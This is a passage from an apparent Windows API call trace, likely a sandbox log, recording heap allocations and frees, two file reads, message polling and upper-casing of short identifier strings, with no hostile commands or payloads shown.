0x2a72748 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.899] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0103.900] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0103.900] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cae020 [0103.903] SetFilePointerEx (in: hFile=0x44c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0103.903] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xd499, lpOverlapped=0x0) returned 1 [0103.905] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0103.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0103.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.905] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0103.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0103.905] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd499) returned 0x2a7a130 [0103.906] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cae020 | out: hHeap=0x2af0000) returned 1 [0103.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0103.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0103.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0103.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.909] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0103.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0103.909] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd499) returned 0x2a875d8 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd499) returned 0x2a7a130 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.910] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0103.910] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0103.911] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0103.911] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0103.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78250 | out: hHeap=0x2af0000) returned 1 [0103.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72748 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd499) returned 0x2a7a130 [0103.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b18 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0103.911] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa97c0 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0103.911] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0103.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd499) returned 0x2a94a80 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0103.912] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0103.912] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0103.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0103.913] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0103.913] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0103.913] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0103.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0103.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0103.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0103.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.914] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.914] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0103.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0103.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0103.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.915] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0103.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ff8 | out: hHeap=0x2af0000) returned 1 [0103.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.915] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0103.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0103.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0103.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.960] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0103.960] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0103.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0103.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0103.961] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0103.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78070 | out: hHeap=0x2af0000) returned 1 [0103.961] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.961] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 